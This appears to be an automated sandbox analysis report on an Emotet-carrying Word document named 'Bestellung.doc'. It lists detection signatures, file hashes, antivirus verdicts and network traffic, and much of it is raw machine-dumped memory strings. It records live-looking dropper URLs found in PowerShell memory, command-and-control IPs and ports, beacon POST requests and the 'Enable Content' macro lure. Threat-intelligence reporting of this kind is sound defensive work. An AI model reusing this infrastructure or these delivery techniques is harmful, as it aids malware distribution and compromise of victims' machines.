Analysis Report Bestellung.doc

Overview

General Information

Sample Name: Bestellung.doc
Analysis ID: 344273
MD5: 268e0826d78c069d3834a8203a44af4f
SHA1: 5f14c1a62195af4f3018b57d097876fb41da7937
SHA256: f9f3c11c9f92d92d74eb40958a14d97f0f36497b6c86109b237628815642102a

Most interesting Screenshot: [screenshot not reproduced in this extract]

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: shop.nowfal.dev Virustotal: Detection: 7%
Source: e-wdesign.eu Virustotal: Detection: 5%
Multi AV Scanner detection for submitted file
Source: Bestellung.doc Virustotal: Detection: 53%
Source: Bestellung.doc ReversingLabs: Detection: 11%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004096ED CryptDecodeObjectEx, 10_2_004096ED

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49172 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2103436602.000000001B860000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.217.6.174:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49174 -> 190.55.186.229:80
Source: Traffic Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.22:49175 -> 203.157.152.9:7080
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49176 -> 157.245.145.87:443
Source: Traffic Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49177 -> 132.248.38.158:80
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.22:49179 -> 110.172.180.180:8080
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 7080
Source: unknown Network traffic detected: HTTP traffic on port 7080 -> 49175
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 203.157.152.9:7080
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 110.172.180.180:8080
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 70.32.89.105:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 203.157.152.9
Source: Joe Sandbox View IP Address: 132.248.38.158
Source: Joe Sandbox View IP Address: 172.217.6.174
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: MOPH-TH-APInformationTechnologyOfficeSG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1DNT: 0Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 203.157.152.9:7080Content-Length: 6292Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /gjk3j942rq/3t3141347sxz/js59r1n8zph/ HTTP/1.1DNT: 0Referer: 157.245.145.87/gjk3j942rq/3t3141347sxz/js59r1n8zph/Content-Type: multipart/form-data; boundary=--------------dFTqLeLs5G7gBBUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.245.145.87:443Content-Length: 5620Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 161.49.84.2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE8CBF3-349E-46EF-BF24-C3A751787722}.tmp
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown HTTP traffic detected: POST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1DNT: 0Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 203.157.152.9:7080Content-Length: 6292Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Tue, 26 Jan 2021 09:49:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2103414288.000000001B4C5000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthori
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2103563563.000000001CC40000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#

E-Banking Fraud:

Yara detected Emotet

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,362 N@m 13 ;a 10096 G) FI G) ,,
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,362 N@m 13 ;a 10096 G) FI G) ,, . [:D:] ,,gS ..,
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Very long command line found
Source: unknown Process created: Commandline size = 5413
Source: unknown Process created: Commandline size = 5312
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5312 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Ueilekrvmxoa\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FE8DD 7_2_001FE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FB8D8 7_2_001FB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002066FB 7_2_002066FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002014FC 7_2_002014FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002000FE 7_2_002000FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002038C2 7_2_002038C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002034C3 7_2_002034C3
